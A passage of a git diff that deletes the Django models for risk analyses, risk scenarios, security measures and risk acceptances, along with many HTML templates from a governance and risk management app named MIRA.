-> str: - return self.name - - -class Analysis(AbstractBaseModel): - project = models.ForeignKey( - Project, on_delete=models.CASCADE, verbose_name=_("Project")) - version = models.CharField( - max_length=100, blank=True, null=True, default="0.1", verbose_name=_("Version")) - auditor = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, - null=True, blank=True, verbose_name=_("Auditor")) - is_draft = models.BooleanField(verbose_name=_("is a draft"), default=True) - rating_matrix = models.ForeignKey(RiskMatrix, on_delete=models.PROTECT, help_text=_( - "WARNING! After choosing it, you will not be able to change it"), verbose_name=_("Rating matrix")) - updated_at = models.DateTimeField(auto_now=True) - - fields_to_check = ['name', 'version'] - - class Meta: - verbose_name = _("Analysis") - verbose_name_plural = _("Analyses") - - def __str__(self) -> str: - return f'{self.project.folder}/{self.project}/{self.name} - {self.version}' - - @property - def path_display(self) -> str: - return f'{self.project.folder}/{self.project}/{self.name} - {self.version}' - - def get_scenario_count(self) -> int: - count = RiskScenario.objects.filter(analysis=self.id).count() - scenario_count = count - return scenario_count - - def quality_check(self) -> dict: - - errors_lst = list() - warnings_lst = list() - info_lst = list() - # --- check on the risk analysis: - if self.is_draft: - info_lst.append({"msg": _("{}: Risk analysis is still in Draft mode").format( - self), "obj_type": "analysis", "object": self}) - if not self.auditor: - info_lst.append({"msg": _("{}: No auditor assigned to this risk analysis yet").format( - self), "obj_type": "analysis", "object": self}) - if not self.riskscenario_set.all(): - warnings_lst.append({"msg": _("{}: Analysis is empty. No risk scenario declared yet").format( - self), "obj_type": "analysis", "object": self}) - # --- - - # --- checks on the risk scenarios - for ri in self.riskscenario_set.all().order_by('created_at'): - - if ri.current_level < 0: - warnings_lst.append({"msg": _("{} current risk level has not been assessed").format( - ri), "obj_type": "riskscenario", "object": ri}) - if ri.residual_level < 0 and ri.current_level >= 0: - errors_lst.append({"msg": _("{} residual risk level has not been assessed. If no additional measures are applied, it should be at the same level as the current risk").format( - ri), "obj_type": "riskscenario", "object": ri}) - if ri.residual_level > ri.current_level: - errors_lst.append({"msg": _("{} residual risk level is higher than the current one").format( - ri), "obj_type": "riskscenario", "object": ri}) - if ri.residual_proba > ri.current_proba: - errors_lst.append({"msg": _("{} residual risk probability is higher than the current one").format( - ri), "obj_type": "riskscenario", "object": ri}) - if ri.residual_impact > ri.current_impact: - errors_lst.append({"msg": _("{} residual risk impact is higher than the current one").format( - ri), "obj_type": "riskscenario", "object": ri}) - - if ri.residual_level < ri.current_level or ri.residual_proba < ri.current_proba or ri.residual_impact < ri.current_impact: - if ri.security_measures.count() == 0 and ri.residual_level >=0: - errors_lst.append( - {"msg": _("{}: residual risk level has been lowered without any specific measure").format(ri), "obj_type": "riskscenario", "object": ri}) - - if ri.treatment == 'accepted': - if not ri.riskacceptance_set.exists(): - warnings_lst.append({"msg": _("{} risk accepted but no risk acceptance attached").format( - ri), "obj_type": "riskscenario", "object": ri}) - # --- - - # --- checks on the security measures - for mtg in SecurityMeasure.objects.filter(riskscenario__analysis=self): - if not mtg.eta: - warnings_lst.append({"msg": _("{}/{} does not have an ETA").format(mtg.folder, - mtg), "obj_type": "securitymeasure", "object": mtg}) - else: - if date.today() > mtg.eta: - errors_lst.append( - {"msg": _("{}/{} ETA is in the past now. Consider updating its status or the date").format(mtg.folder, mtg), "obj_type": "securitymeasure", "object": mtg}) - if not mtg.effort: - warnings_lst.append( - {"msg": _("{}/{} does not have an estimated effort. This will help you for prioritization").format(mtg.folder, mtg), "obj_type": "securitymeasure", "object": mtg}) - if not mtg.link: - info_lst.append( - {"msg": _("{}/{}: Security measure does not have an external link attached. This will help you for follow-up").format(mtg.folder, mtg), "obj_type": "securitymeasure", "object": mtg}) - - # --- checks on the risk acceptances - for ra in RiskAcceptance.objects.filter(risk_scenarios__analysis=self): - if not ra.expiry_date: - warnings_lst.append({"msg": _("{}/{}: Acceptance has no expiry date").format(ra.folder, - ra), "obj_type": "securitymeasure", "object": ra}) - continue - if date.today() > ra.expiry_date: - errors_lst.append( - {"msg": _("{}/{}: Acceptance has expired. Consider updating the status or the date").format(ra.folder, ra), "obj_type": "riskacceptance", "object": ra}) - - findings = { - "errors": errors_lst, - "warnings": warnings_lst, - "info": info_lst, - "count": len(errors_lst + warnings_lst + info_lst) - } - return findings - - # NOTE: if your save() method throws an exception, you might want to override the clean() method to prevent - # 500 errors when the form submitted. See https://docs.djangoproject.com/en/dev/ref/models/instances/#django.db.models.Model.clean - - -def risk_scoring(probability, impact, matrix: RiskMatrix) -> int: - fields = json.loads(matrix.json_definition) - risk_index = fields['grid'][probability][impact] - return risk_index - - -class SecurityMeasure(AbstractBaseModel): - MITIGATION_STATUS = [ - ('open', _('Open')), - ('in_progress', _('In progress')), - ('on_hold', _('On hold')), - ('done', _('Done')), - ] - - MITIGATION_TYPE = [ - ('n/a', _('N/A')), - ('technical', _('Technical')), - ('organizational', _('Organizational')), - ] - - EFFORT = [ - ('S', _('Small')), - ('M', _('Medium')), - ('L', _('Large')), - ('XL', _('Extra-Large')), - ] - - MAP_EFFORT = {None: -1, 'S': 1, 'M': 2, 'L': 4, 'XL': 8} - # todo: think about a smarter model for ranking - - folder = models.ForeignKey( - Folder, on_delete=models.CASCADE, verbose_name=_("Domain")) - security_function = models.ForeignKey( - SecurityFunction, on_delete=models.CASCADE, null=True, blank=True, verbose_name=_("Security Function")) - type = models.CharField( - max_length=20, choices=MITIGATION_TYPE, default='n/a', verbose_name=_("Type")) - status = models.CharField( - max_length=20, choices=MITIGATION_STATUS, default='open', verbose_name=_("Status")) - eta = models.DateField(blank=True, null=True, help_text=_( - "Estimated Time of Arrival"), verbose_name=_("ETA")) - link = models.CharField(null=True, blank=True, max_length=1000, - help_text=_( - "External url for action follow-up (eg. Jira ticket)"), - verbose_name=_("Link")) - effort = models.CharField(null=True, blank=True, max_length=2, choices=EFFORT, - help_text=_( - "Relative effort of the measure (using T-Shirt sizing)"), - verbose_name=_("Effort")) - - created_at = models.DateTimeField( - auto_now_add=True, verbose_name=_("Created at")) - updated_at = models.DateTimeField( - auto_now=True, verbose_name=_("Updated at")) - - class Meta: - verbose_name = _("Security measure") - verbose_name_plural = _("Security measures") - - @property - def risk_scenarios(self): - return self.riskscenario_set.all() - - @property - def analyses(self): - return {scenario.analysis for scenario in self.risk_scenarios} - - @property - def projects(self): - return {analysis.project for analysis in self.analyses} - - def parent_project(self): - pass - - def __str__(self): - return self.name - - @property - def mid(self): - return f'M.{self.scoped_id(scope=SecurityMeasure.objects.filter(folder=self.folder))}' - - def get_ranking_score(self): - if self.effort: - value = 0 - for risk_scenario in self.riskscenario_set.all(): - current = risk_scenario.current_level - residual = risk_scenario.residual_level - if current >= 0 and residual >= 0: - value += (1 + current - residual)*(current + 1) - return round(value/self.MAP_EFFORT[self.effort], 4) - else: - return 0 - - @property - def get_html_url(self): - url = reverse('securitymeasure-detail', args=(self.id,)) - return format_html(' [MT-eta] {}: {} ', url, self.folder.name, self.name) - - -class RiskScenario(AbstractBaseModel): - TREATMENT_OPTIONS = [ - ('open', _('Open')), - ('mitigated', _('Mitigated')), - ('accepted', _('Accepted')), - ('blocker', _('Show-stopper')), - ('transferred', _('Transferred')), - ] - - analysis = models.ForeignKey( - Analysis, on_delete=models.CASCADE, verbose_name=_("Analysis")) - assets = models.ManyToManyField(Asset, verbose_name=_( - "Assets"), blank=True, help_text=_("Assets impacted by the risk scenario")) - security_measures = models.ManyToManyField( - SecurityMeasure, verbose_name=_("Security measures"), blank=True) - threat = models.ForeignKey( - Threat, on_delete=models.CASCADE, verbose_name=_("Threat")) - existing_measures = models.TextField(max_length=2000, - help_text=_( - "The existing security measures to manage this risk. Edit the risk scenario to add extra security measures."), - verbose_name=_("Existing measures"), blank=True) - - # current - current_proba = models.SmallIntegerField( - default=-1, verbose_name=_("Current probability")) - current_impact = models.SmallIntegerField( - default=-1, verbose_name=_("Current impact")) - current_level = models.SmallIntegerField(default=-1, verbose_name=_("Current level"), - help_text=_('The risk level given the current measures. Automatically updated on Save, based on the chosen matrix')) - - # residual - residual_proba = models.SmallIntegerField( - default=-1, verbose_name=_("Residual probability")) - residual_impact = models.SmallIntegerField( - default=-1, verbose_name=_("Residual impact")) - residual_level = models.SmallIntegerField(default=-1, verbose_name=_("Residual level"), - help_text=_('The risk level when all the extra measures are done. Automatically updated on Save, based on the chosen matrix')) - - treatment = models.CharField(max_length=20, choices=TREATMENT_OPTIONS, default='open', - verbose_name=_("Treatment status")) - - updated_at = models.DateTimeField( - auto_now=True, verbose_name=_("Updated at")) - comments = models.CharField( - max_length=500, blank=True, null=True, verbose_name=_("Comments")) - - class Meta: - verbose_name = _("Risk scenario") - verbose_name_plural = _("Risk scenarios") - - # def get_rating_options(self, field: str) -> list[tuple]: - # matrix = self.analysis.rating_matrix.parse_json() - # return [(k, v) for k, v in matrix.fields[field].items()] - - def parent_project(self): - return self.analysis.project - parent_project.short_description = _("Project") - - def get_matrix(self): - return self.analysis.rating_matrix.parse_json() - - def get_current_risk(self): - if self.current_level < 0: - return {'abbreviation': '--', 'name': '--', 'description': 'not rated', 'hexcolor': '#A9A9A9'} - matrix = self.get_matrix() - return matrix['risk'][self.current_level] - - def get_current_impact(self): - if self.current_impact < 0: - return {'abbreviation': '--', 'name': '--', 'description': 'not rated'} - matrix = self.get_matrix() - return matrix['impact'][self.current_impact] - - def get_current_proba(self): - if self.current_proba < 0: - return {'abbreviation': '--', 'name': '--', 'description': 'not rated'} - matrix = self.get_matrix() - return matrix['probability'][self.current_proba] - - def get_residual_risk(self): - if self.residual_level < 0: - return {'abbreviation': '--', 'name': '--', 'description': 'not rated', 'hexcolor': '#A9A9A9'} - matrix = self.get_matrix() - return matrix['risk'][self.residual_level] - - def get_residual_impact(self): - if self.residual_impact < 0: - return {'abbreviation': '--', 'name': '--', 'description': 'not rated'} - matrix = self.get_matrix() - return matrix['impact'][self.residual_impact] - - def get_residual_proba(self): - if self.residual_proba < 0: - return {'abbreviation': '--', 'name': '--', 'description': 'not rated'} - matrix = self.get_matrix() - return matrix['probability'][self.residual_proba] - - def __str__(self): - return str(self.parent_project().folder) + _('/') + str(self.parent_project()) + _(': ') + str(self.name) - - @property - def rid(self): - return f'R.{self.scoped_id(scope=RiskScenario.objects.filter(analysis=self.analysis))}' - - def save(self, *args, **kwargs): - if self.current_proba >= 0 and self.current_impact >= 0: - self.current_level = risk_scoring( - self.current_proba, self.current_impact, self.analysis.rating_matrix) - else: - self.current_level = -1 - if self.residual_proba >= 0 and self.residual_impact >= 0: - self.residual_level = risk_scoring( - self.residual_proba, self.residual_impact, self.analysis.rating_matrix) - else: - self.residual_level = -1 - super(RiskScenario, self).save(*args, **kwargs) - - -class RiskAcceptance(AbstractBaseModel): - - ACCEPTANCE_STATE = [ - ('created', _('Created')), - ('submitted', _('Submitted')), - ('accepted', _('Accepted')), - ('rejected', _('Rejected')), - ('revoked', _('Revoked')), - ] - - folder = models.ForeignKey(Folder, on_delete=models.CASCADE, verbose_name=_("Domain")) - risk_scenarios = models.ManyToManyField(RiskScenario, verbose_name=_("Risk scenarios"), help_text=_("Select the risk scenarios to be accepted, attention they must be part of the chosen domain")) - validator = models.ForeignKey(User, max_length=200, help_text=_("Risk owner and validator identity"), verbose_name=_("Validator"), on_delete=models.SET_NULL, null=True, blank=True) - state = models.CharField(max_length=20, choices=ACCEPTANCE_STATE, default='created', verbose_name=_("State")) - expiry_date = models.DateField(help_text=_("Specify when the risk acceptance will no longer apply"), - null=True, verbose_name=_("Expiry date")) - updated_at = models.DateTimeField(auto_now=True, verbose_name=_("Updated at")) - accepted_date = models.DateTimeField(blank=True, null=True, verbose_name=_("Acceptance date")) - rejected_date = models.DateTimeField(blank=True, null=True, verbose_name=_("Rejection date")) - revoked_date = models.DateTimeField(blank=True, null=True, verbose_name=_("Revocation date")) - comments = models.CharField(max_length=500, blank=True, null=True, verbose_name=_("Comments")) - - class Meta: - permissions = [("validate_riskacceptance", "Can validate/rejected risk acceptances")] - verbose_name = _("Risk acceptance") - verbose_name_plural = _("Risk acceptances") - - def __str__(self): - if self.name: - return self.name - scenario_names: str = ', '.join( - [str(scenario) for scenario in self.risk_scenarios.all()]) - return f"{scenario_names}" - - @property - def get_html_url(self): - url = reverse('riskacceptance-detail', args=(self.id,)) - return format_html(' [RA-exp] {}: {} ', url, self.folder.name, self.name) - - def set_state(self, state): - self.state = state - if state == "accepted": - self.accepted_date = datetime.now() - if state == "rejected": - self.rejected_date = datetime.now() - elif state == "revoked": - self.revoked_date = datetime.now() - self.save() -# you can consider nested inlines at some points diff --git a/core/templates/base.html b/core/templates/base.html deleted file mode 100644 index 0e12708..0000000 --- a/core/templates/base.html +++ /dev/null @@ -1,109 +0,0 @@ -{% load static tailwind_tags core_extras %} -{% load i18n %} -{% get_current_language as LANGUAGE_CODE %} - - - - - {% block title %}MIRA{% endblock title %} - - - - - - - - - - {% block head %} - {% endblock %} - {% tailwind_css %} - - - - - - -
    - {% include 'core/sidebar.html' %} - {% include 'snippets/messages.html' %} -
    - {% if exceeded_users %} -
    -

    {% trans "The maximum number of licensed users has been exceeded. Please reduce the number of users or acquire an appropriate license." %}

    -
    - {% endif %} -
    - {% block content %} - {% endblock %} - {% comment %} - the 'About MIRA' modal summoned from the sidebar was placed here to fix its rendering on Safari. - {% endcomment %} - {% include 'snippets/modal/modal_about_mira.html' with header=_("About MIRA") %} -
    -
    -
    - - - \ No newline at end of file diff --git a/core/templates/core/acceptance_list.html b/core/templates/core/acceptance_list.html deleted file mode 100644 index 33084f8..0000000 --- a/core/templates/core/acceptance_list.html +++ /dev/null @@ -1,225 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} -
    - {% with page_title=_('Risk acceptances') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} - -
    -
    -
    -
    -
    - -
    - {{ filter.form.search }} -
    -
    -
    - - - - - - -
    -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    - - {% url 'riskacceptance-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - - {% if add_riskacceptance%} - {% include 'snippets/add_button_modal.html' with form=risk_acceptance_create_form header=_("Add Risk Acceptance") model="riskacceptance" content=_("New risk acceptance") %} - {% endif %} -
    - -
    -
    - - - - - - - - - {% for acceptance in acceptances %} - - - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Risk acceptance" %}{% trans "Domain" %}{% trans "Validator" %}{% trans "Expiry Date" %}{% trans "Actions" %}
    -
    - {{ acceptance.get_state_display|lower}} - - {% if acceptance.validator == user and acceptance.state == "submitted" %} - - {% trans "action requested" %} - - {% endif %} -
    -

    - {{ acceptance }} -

    -
    -
    -
    -

    - {{ acceptance.folder }} -

    -
    -

    - {{ acceptance.validator }} -

    -
    -

    - {{ acceptance.expiry_date|date }} -

    -
    -
    - - {% if acceptance.id in object_ids_change and acceptance.state not in blocked_states %} - - - - - - {% endif %} - {% if acceptance.id in object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=acceptance header=_("Delete risk acceptance?") model='riskacceptance' %} - {% endif %} - -
    -
    - -

    {% trans "No risk acceptance found." %}

    -
    - {% include 'snippets/paginator.html' %} - - - -{% endblock %} diff --git a/core/templates/core/analysis_list.html b/core/templates/core/analysis_list.html deleted file mode 100644 index 2224e17..0000000 --- a/core/templates/core/analysis_list.html +++ /dev/null @@ -1,193 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} - -
    - {% with page_title=_('Risk analyses') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} -
    - -
    -
    -
    -
    - -
    - {{ filter.form.project__name }} -
    -
    -
    - - - - - -
    -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'analysis-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - - {% if add_analysis %} - {% if no_matrix %} - {% include 'snippets/link_modal.html' with header=_("WARNING") content=_("New risk analysis") topic='no_matrix' %} - {% else %} - {% include 'snippets/add_button_modal.html' with form=analysis_create_form header=_("Add analysis") model="analysis" content=_("New risk analysis") %} - {% endif %} - {% endif %} - -
    - -
    - - - - - - - - - - - {% for analysis in page_obj %} - - - - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "ID" %}{% trans "Auditor" %}{% trans "Risk scenarios" %}{% trans "Rating matrix" %}{% trans "Last Update" %}{% trans "Actions" %}
    -
    - {% if analysis.is_draft %} - {% trans "draft" %} - {% else %} - {% trans "ready" %} - {% endif %} -
    -

    - {{ analysis }} -

    -
    -
    -
    -

    - {% if analysis.auditor %} - {{ analysis.auditor }} - {% else %}--{% endif %} -

    -
    -

    - {{ analysis.get_scenario_count }} -

    -
    -

    - {{ analysis.rating_matrix }} -

    -
    -

    - {{ analysis.updated_at|date }} -

    -
    - -
    - - {% if analysis.id in object_ids_change %} - - - - - - {% endif %} - {% if analysis.id in object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=analysis header=_("Delete risk analysis?") %} - {% endif %} -
    -
    - -

    {% trans "No analysis found." %}

    -
    - {% include 'snippets/paginator.html' %} -
    -
    - - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/asset_form.html b/core/templates/core/asset_form.html deleted file mode 100644 index 5d320c3..0000000 --- a/core/templates/core/asset_form.html +++ /dev/null @@ -1,38 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static %} -{% block content %} -{% with page_title=asset %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - - - -
    -
    -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/asset_list.html b/core/templates/core/asset_list.html deleted file mode 100644 index c7865c1..0000000 --- a/core/templates/core/asset_list.html +++ /dev/null @@ -1,112 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - - -{% block content %} -
    - {% with page_title=_('Assets') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} -
    - -
    -
    -
    -
    - -
    - {{ filter.form.name }} -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'asset-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - - {% if add_asset %} - {% include 'snippets/add_button_modal.html' with form=asset_create_form header=_("Add asset") model="asset" content=_("New asset") %} - {% endif %} - -
    - -
    - - - - - - - - - - {% for asset in page_obj %} - - - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Name" %}{% trans "Description" %}{% trans "Business value" %}{% trans "Type" %}{% trans "Actions" %}
    -
    -
    -

    - {{ asset }} -

    -
    -
    -
    -

    - {{ asset.description|linebreaksbr }} -

    -
    -

    - {{ asset.business_value|linebreaksbr }} -

    -
    -

    - {{ asset.get_type_display }} -

    -
    - -
    - - {% if asset.id in object_ids_change %} - - - - - - {% endif %} - {% if asset.id in object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=asset header=_("Delete asset?") model='asset' %} - {% endif %} -
    -
    - -

    {% trans "No asset found." %}

    -
    - {% include 'snippets/paginator.html' %} -
    -
    - - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/base.html b/core/templates/core/base.html deleted file mode 100644 index d798363..0000000 --- a/core/templates/core/base.html +++ /dev/null @@ -1,107 +0,0 @@ -{% load static tailwind_tags core_extras %} -{% load i18n %} -{% get_current_language as LANGUAGE_CODE %} - - - - - {% block title %}MIRA{% endblock title %} - - - - - - - - - {% block head %} - {% endblock %} - {% tailwind_css %} - - - - - -
    - {% include 'core/sidebar.html' %} - {% include 'snippets/messages.html' %} -
    - {% if exceeded_users %} -
    -

    {% trans "The maximum number of licensed users has been exceeded. Please reduce the number of users or acquire an appropriate license." %}

    -
    - {% endif %} -
    - {% block content %} - {% endblock %} - {% comment %} - the 'About MIRA' modal summoned from the sidebar was placed here to fix its rendering on Safari. - {% endcomment %} - {% include 'snippets/modal/modal_about_mira.html' with header=_("About MIRA") %} -
    -
    -
    - - - \ No newline at end of file diff --git a/core/templates/core/base_pdf.html b/core/templates/core/base_pdf.html deleted file mode 100644 index d9fdaa6..0000000 --- a/core/templates/core/base_pdf.html +++ /dev/null @@ -1,293 +0,0 @@ - - - - - - - - -{% block content %}{% endblock %} - - \ No newline at end of file diff --git a/core/templates/core/browser.html b/core/templates/core/browser.html deleted file mode 100644 index d6b1274..0000000 --- a/core/templates/core/browser.html +++ /dev/null @@ -1,79 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n %} - -{% block head %} -Mira - Viewer - -{% endblock %} - -{% block content %} -
    - - -
    -
    {% blocktrans with type=context.type %} Browsing {{ type }} {% endblocktrans %} {% blocktrans with filter=context.filter %} with filter: {{ filter }}{% endblocktrans %}
    - - {% if context.type == "Risk scenarios" %} - - - - - - - - - - - - - {% for item in context.items %} - - - - - - - - - {% endfor %} - -
    {% trans "Project" %}{% trans "Name" %}{% trans "Current level" %}{% trans "Residual level" %}{% trans "Treatment status" %}{% trans "Locate" %}
    {{ item.analysis.project }}{{ item.name }}{{ item.get_current_risk }}{{ item.get_residual_risk }}{{ item.get_treatment_display }}
    - {% else %} - - - - - - - - - - - - - {% for item in context.items %} - - - - - - - - - {% endfor %} - -
    {% trans "Name" %}{% trans "Domain" %}{% trans "ETA" %}{% trans "Associated risk scenarios" %}{% trans "Status" %}{% trans "Locate" %}
    {{ item.name }}{{ item.folder }}{{ item.eta }} - {% for risk in item.risk_scenarios %} - {{ risk }}{% if not forloop.last %}, {% endif %} - {% endfor %} - {{ item.get_status_display }}
    - - {% endif %} - - -
    - -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/calendar.html b/core/templates/core/calendar.html deleted file mode 100644 index 2796426..0000000 --- a/core/templates/core/calendar.html +++ /dev/null @@ -1,18 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n %} - -{% block content %} -{% with page_title=_('Calendar') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    - -
    - {{ calendar }} -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/composer.html b/core/templates/core/composer.html deleted file mode 100644 index fd9281a..0000000 --- a/core/templates/core/composer.html +++ /dev/null @@ -1,138 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n %} - -{% block head %} - -{% endblock %} -{% block content %} -
    -
    {% trans "Your selection" %}
    -
    {% trans "Hint: you can bookmark this page for future usage" %}
    -
    -
    - {% blocktrans count counter=context.analysis_objects|length %} - Here is the overview for the selected analysis: - {% plural %} - Here is the overview for the {{ counter }} selected analyses: - {% endblocktrans %} -
    -
    -
    -
    -
    {% trans "Current risk level per risk scenario" %}
    - -
    - {% trans "Current risk level per risk scenario" as cur_rsk_label %} - {% include 'snippets/donut_chart.html' with name='cur_rsk' s_label=cur_rsk_label values=context.current_level colors=context.colors %} -
    -
    -
    -
    -
    {% trans "Status of associated measures" %}
    -
    -
    - {% include 'snippets/bar_chart.html' with name='mtg' labels=context.security_measure_status.labels values=context.security_measure_status.values %} -
    -
    -
    -
    -
    {% trans "Residual risk level per risk scenario" %}
    -
    - {% trans "Residual risk level per risk scenario" as rsd_rsk_label %} - {% include 'snippets/donut_chart.html' with name='rsd_rsk' s_label=rsd_rsk_label values=context.residual_level colors=context.colors %} -
    - -
    -
    -
    -
    -  {% trans "For the selected scope, you have:" %} -
    -
      -
    • - {% blocktrans count counter=context.counters.untreated %} - {{ counter }} untreated risk scenario - {% plural %} - {{ counter }} untreated risk scenarios - {% endblocktrans %} -
        - {% for scenario in context.riskscenarios.untreated %} -
      • {{ scenario }}
      • - {% endfor %} -
      -
    • -
    • {% trans "and" %} - {% blocktrans count counter=context.counters.accepted %} - {{ counter }} risk scenario accepted - {% plural %} - {{ counter }} risk scenarios accepted - {% endblocktrans %} -
        - {% for scenario in context.riskscenarios.accepted %} -
      • {{ scenario }}
      • - {% endfor %} -
      -
    • -
    - -
    -
    -
    - {% for item in context.analysis_objects %} - -
    -
    -
    -
    - - -
    - -
    {% if item.analysis.quality_check.count > 0 %} {% trans "Review needed" %} - {% else %} {% trans "Ok" %} {% endif %} -
    -
    -
    -
    -
    - {% if item.analysis.quality_check.count > 0 %}➡️ {% trans "Found" %} - {% blocktrans count counter=item.analysis.quality_check.count %} - {{ counter }} inconsistency that you need to check (use x-rays for more information). - {% plural %} - {{ counter }} inconsistencies that you need to check (use x-rays for more information). - {% endblocktrans %} - {% endif %} -
    -
    - - - - - - - {% for lvl in item.synth_table %} - - - - - - - {% endfor %} - -
    {% trans "Current" %}{% trans "Residual" %}
    {{ lvl.lvl }}{{ lvl.current }}{{ lvl.residual }}
    -
    - - -
    -
    -
    - -
    - {% endfor %} -
    -{% endblock %} diff --git a/core/templates/core/detail/folder_detail.html b/core/templates/core/detail/folder_detail.html deleted file mode 100644 index 49ffa9b..0000000 --- a/core/templates/core/detail/folder_detail.html +++ /dev/null @@ -1,12 +0,0 @@ -{% extends 'generic/detail.html' %} -{% load static i18n %} - -{% block below %} -
    -
    -

    {% trans "Associated Projects" %}

    - {% include 'snippets/add_button_modal.html' with form=project_create_form header=_("Add project") model="project" content=_("New project") %} -
    - {% include 'snippets/project_list_nested.html' with domain=object %} -
    -{% endblock below %} diff --git a/core/templates/core/detail/project_detail.html b/core/templates/core/detail/project_detail.html deleted file mode 100644 index 8b4e1e1..0000000 --- a/core/templates/core/detail/project_detail.html +++ /dev/null @@ -1,16 +0,0 @@ -{% extends 'generic/detail.html' %} -{% load static i18n %} - -{% block below %} -
    -
    -

    {% trans "Associated risk analyses" %}

    - {% if no_matrix %} - {% include 'snippets/link_modal.html' with header=_("WARNING") content=_("New risk analysis") topic='no_matrix' %} - {% else %} - {% include 'snippets/add_button_modal.html' with form=analysis_create_form header=_("Add analysis") model="analysis" content=_("New risk analysis") %} - {% endif %} -
    - {% include 'snippets/ra_list_nested.html' with project=object %} -
    -{% endblock below %} \ No newline at end of file diff --git a/core/templates/core/detail/riskacceptance_detail.html b/core/templates/core/detail/riskacceptance_detail.html deleted file mode 100644 index 04c4acd..0000000 --- a/core/templates/core/detail/riskacceptance_detail.html +++ /dev/null @@ -1,37 +0,0 @@ -{% extends 'generic/detail.html' %} -{% load static i18n %} - -{% block above %} - {% if risk_acceptance_need_validation and validate_riskacceptance %} -
    -
    - {% trans "This risk acceptance is awaiting processing. Remember to review it before accepting or rejecting it, you will not be able to go back." %} -
    -
    - {% include 'snippets/action_button_modal.html' with header=_("Accept risk acceptance") content=_("Accept") name="accepted" %} - {% include 'snippets/action_button_modal.html' with header=_("Reject risk acceptance") content=_("Reject") name="rejected" %} -
    -
    - {% endif %} -{% endblock above %} - -{% block edit_button %} -{% if change and not risk_acceptance_accepted and not risk_acceptance_rejected and not risk_acceptance_revoked %} - - {% trans "Edit" %} - -{% endif %} -{% endblock edit_button %} - -{% block below %} - {% if risk_acceptance_accepted and validate_riskacceptance %} -
    -
    - {% trans "This risk acceptance is currently accepted. You can revoke it at any time, but this will be irrevocable. You will need to duplicate it with a different verison if necessary." %} -
    -
    - {% include 'snippets/action_button_modal.html' with header=_("Revoke risk acceptance") content=_("Revoke") name="revoked" %} -
    -
    - {% endif %} -{% endblock below %} \ No newline at end of file diff --git a/core/templates/core/fallback_form.html b/core/templates/core/fallback_form.html deleted file mode 100644 index 09975a8..0000000 --- a/core/templates/core/fallback_form.html +++ /dev/null @@ -1,65 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n %} -{% block content %} -{% with page_title=object_type %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -
    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {% if field.field.widget.attrs.disabled %} - - {% endif %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    -
    - - -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/fragments/animated_donut_chart.html b/core/templates/core/fragments/animated_donut_chart.html deleted file mode 100644 index b528bc8..0000000 --- a/core/templates/core/fragments/animated_donut_chart.html +++ /dev/null @@ -1,140 +0,0 @@ -{% load i18n %} -
    - \ No newline at end of file diff --git a/core/templates/core/fragments/measures_status.html b/core/templates/core/fragments/measures_status.html deleted file mode 100644 index bf77bb6..0000000 --- a/core/templates/core/fragments/measures_status.html +++ /dev/null @@ -1,31 +0,0 @@ -
    - - \ No newline at end of file diff --git a/core/templates/core/fragments/risks_over_time.html b/core/templates/core/fragments/risks_over_time.html deleted file mode 100644 index 048813c..0000000 --- a/core/templates/core/fragments/risks_over_time.html +++ /dev/null @@ -1,129 +0,0 @@ -{% load i18n %} -
    - \ No newline at end of file diff --git a/core/templates/core/fragments/watchlist_exceptions.html b/core/templates/core/fragments/watchlist_exceptions.html deleted file mode 100644 index c779b44..0000000 --- a/core/templates/core/fragments/watchlist_exceptions.html +++ /dev/null @@ -1,55 +0,0 @@ -{% load i18n %} - -
    - - - - - - - - - - - {% for acceptance in acceptances_to_review %} - - - - - - - {% empty %} - - - - {% endfor %} - -
    - {% trans "Acceptance" %} - - {% trans "Domain" %} - - {% trans "Validator" %} - - {% trans "Expiry date" %} -
    - {% if acceptance.validator == user and acceptance.state == 'submitted' %} - - {% trans "action requested" %} - - {% endif %} - {{ acceptance }} - - {{ acceptance.folder }} - - {{ acceptance.validator }} - - {% if acceptance.expiry_date < today %} - {% trans "expired" %} - {% endif %} - {{ acceptance.expiry_date }} -
    - -

